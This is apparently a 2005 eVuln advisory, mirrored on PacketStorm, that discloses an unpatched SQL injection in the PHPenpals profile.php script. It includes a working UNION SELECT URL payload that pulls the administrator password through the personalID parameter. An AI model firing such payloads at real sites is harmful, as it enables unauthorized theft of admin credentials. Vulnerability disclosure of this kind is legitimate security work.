EV0005.txt

2006-01-04T00:00:00
ID PACKETSTORM:42767
Type packetstorm
Reporter Aliaksandr Hartsuyeu
Modified 2006-01-04T00:00:00

Description

                                        
                                            `New eVuln Advisory:  
PHPenpals SQL Injection Vulnerability  
  
--------------------Summary----------------  
Vendor: Jevontec (http://jevontech.com/)  
Software: PHPenpals  
Versions: 310704  
Critical Level: Moderate  
Type: SQL Injection  
Class: Remote  
Status: Unpatched  
Exploit: Available  
Solution: Not Available  
Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)  
Published: 2005.12.29  
eVuln ID: EV0005  
  
-----------------Description--------------  
Vulnerable scripts:  
profile.php  
  
Variable $personalID isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.  
  
  
--------------Exploit---------------------  
Administrator's password:  
http://host/phpenpals/profile.php?personalID=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,password,14%20from%20admin/*  
  
--------------Solution---------------------  
No Patch available.  
  
--------------Credit---------------------  
Original Advisory:  
http://evuln.com/vulns/5/summary.html  
  
Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)  
`